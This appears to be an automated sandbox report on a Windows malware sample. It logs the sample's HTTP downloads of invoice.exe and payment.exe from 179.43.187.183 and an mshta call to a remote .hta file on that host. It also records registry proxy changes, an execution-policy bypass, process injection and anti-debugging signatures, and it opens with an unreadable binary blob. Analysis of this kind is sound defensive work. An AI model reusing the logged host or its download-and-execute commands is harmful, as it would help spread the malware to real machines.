Data received ƒìti:F?Vð/ øé–: žÝä¨8Ü%˜‡ëuÍ×ÑeíÌkƒ ÷¢ÆPe€Iö4êȊíkH[`ĕÃÝðD`+q óäÖýRƒ¤š=ÊÙ"=3T£S kŽnàK Õ;¹vj¿á©ïð±GÑ脮¯‡P*«oűHÛF/Bpf2f¦Õ é~²¤kqvèÂS+O×Î#éȃc¦‡ÐWùà8êT®¸T}DB °8SCòT–Ç~ê‰ðŸ,`?þ¦aè?†Äޞ¤ÂáT¯Á¯F ¡Z?ðO÷“(ÙlÊã$æ°O¤¼8þ ÿŸdL°ánˆÜ®zz’“ Yn\Ý{-³;®hKX^9èC…ksæ¸]߈5…vÓ7ëO‡ì‡©Ò3õ=$ãG VÛÙ »“^ýRpf¿þj `d[ ›î¤%Ò%nîÜ}ºôÜ)ç`™KUƒP&B!;·~ÍõkÑÂJÖ8‡Dâß)âR60\™µ3„lê0t¥13§Å1k‹¶ŠÒ¹(ŒŸÉ¸õ` m¨ÀMC²þB 'OvcϬ¿¯ $ô%½¬ž‘¼³Ärg/b–{Še ‘±>Tò/y%·¾MÎ}2¶‡4 H¡îE—#ᘮ “-çúfXÙ_»òŽ˜’]¶„1¯r9¶ {k­ß«~œ¾íw œ4ÄwþV‘ÒLàÆ@F À`È­ßÜ6_RBMUÌÓ½•³Q½£í|©+úBJ£‚\3ç†`–g¥Š–>½C âzé$óðàÊaU&R!¾Yr˜–Þz×¾Ê-¦àËK#ѵÕA9Îj‰£·¡Øžåy’!'#WD¡L˜áW4©Ãëسoptwå„%†Ž˜Vĉ ‡$kQ­ÑӑÍÿÛumtµ9G°Ø_{ýLš6×Ö ?D„2JñW¢èdý 3WÓ£¯‹å»¦›r*´X—iæ\)íä;3—Hç(­í‚¾ùÿC‘*ß1ÅÑA–z¡ØÞ=—è Š8xºh7Ln¬Ûd瀼uÓ²a«Íõo˜/=`º»ÍÛ_oZÔGõj|KzÑ4r¥ž*G' ¨lšÏeNéN®´Ó£mí£aupž&ÄÞªäö¼ Ö¾[+gé uºbÌÕ3׫w#%FZäʕ¯tIž‘„;&Ä Ýâ†1èuÒ8Ê@¥0à‰5n`*òéTðÅQ7b!žæ @—µ;{Ž5,¾äT(PSàÑlÐ̉îÜÝTêÀ·œå=ÅÖh»ÍVá<¡¤FÂEMláäÎvIßh†3”£M´&úy"M]!¬P.LnOÃ0_‹•À»I텊ÈÃrяTޖY—‡ þ[©©ÿçgö S(ò¹UûnDh‚vŸÕsøˆ)ž.ø{Ë.É·1§Õùújâe„b"¤­(ƒhÌÜSb˜/°Ó9r€å |¦ æ5”£Æd÷¬9#µ”ÇÞòà w’ í§_ qïP7¶r†dxVXdµk¨¬–2¬…DzWj¸Dþu uÞðß¾AÔ463Óuw*r&úµ­Ö­ÕÃßTUJºï…/µŽóƒK˜:ƒ_ØÇcÃ6wæ%ß:~R±­—~,.ÒMé¿5/ì…þ?Ât98 °³Y7tã3jDϋUæm•Ú_t\¨‰‰:MûÔ/“Ý^ŽÛ ýU5ê!âØpw,f¾!A!5fA=dº;*®WåþÁ Šv´Rz,#</§øçÕß S2uCÏ»ó]œÇª)èÞ:êk€%‘ ST0È(w\ô™ÿ·ôó=”züêGRìÌçØ»ˆãÔ¦hÒÔ½LË<¡é_’‚ Ágpe܀ :s˽ÁÇU]§_[¥TùëíkÄ?‚N 2š”AõÝ·Þ„ Y2¨z‡!
Data sent GET /hhfm/invoice.exe HTTP/1.1 Host: 179.43.187.183 Connection: Keep-Alive
Data sent GET /hhfm/payment.exe HTTP/1.1 Host: 179.43.187.183
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 179.43.187.183
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002f0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
count 2316 name heapspray process powershell.exe total_mb 144 length 65536 protection PAGE_READWRITE
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002f0
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
Time & API Arguments Status Return Repeated

send

 buffer: GET /hhfm/invoice.exe HTTP/1.1 Host: 179.43.187.183 Connection: Keep-Alive
socket: 1420
sent: 80
1 80 0

send

 buffer: GET /hhfm/payment.exe HTTP/1.1 Host: 179.43.187.183
socket: 1420
sent: 56
1 56 0
parent_process powershell.exe martian_process "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\invoice.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\invoice.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\payment.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\payment.exe"
Process injection Process 2192 resumed a thread in remote process 2272
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2272
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\mshta.exe
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe